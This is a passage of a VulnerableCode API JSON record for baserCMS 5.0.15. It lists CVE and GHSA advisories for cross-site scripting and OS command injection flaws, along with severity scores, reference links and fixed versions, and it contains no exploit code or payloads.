                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_98693329"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998",
                    "reference_id": "CVE-2024-46998",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x",
                    "reference_id": "GHSA-p3m2-mj3j-j49x",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x",
                    "reference_id": "GHSA-p3m2-mj3j-j49x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46998",
                "GHSA-p3m2-mj3j-j49x"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=api",
            "vulnerability_id": "VCID-sqr4-v889-tff8",
            "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in the Blog posts and Contents list features of baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79118",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.01179",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79112",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_00876083",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_00876083"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994",
                    "reference_id": "CVE-2024-46994",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr",
                    "reference_id": "GHSA-wrjc-fmfq-w3jr",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr",
                    "reference_id": "GHSA-wrjc-fmfq-w3jr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"
                }
            ],
            "aliases": [
                "CVE-2024-46994",
                "GHSA-wrjc-fmfq-w3jr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=api",
            "vulnerability_id": "VCID-y2sz-c6vb-pkdp",
            "summary": "baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19949",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19955",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7",
                    "reference_id": "GHSA-m9g7-rgfc-jcm7",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30877",
                "GHSA-m9g7-rgfc-jcm7"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=api",
            "vulnerability_id": "VCID-zqd4-rdem-jfgk",
            "summary": "baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious JavaScript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01622",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01615",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm",
                    "reference_id": "GHSA-jmq3-x8q7-j9qm",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30879",
                "GHSA-jmq3-x8q7-j9qm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.5",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.15"
}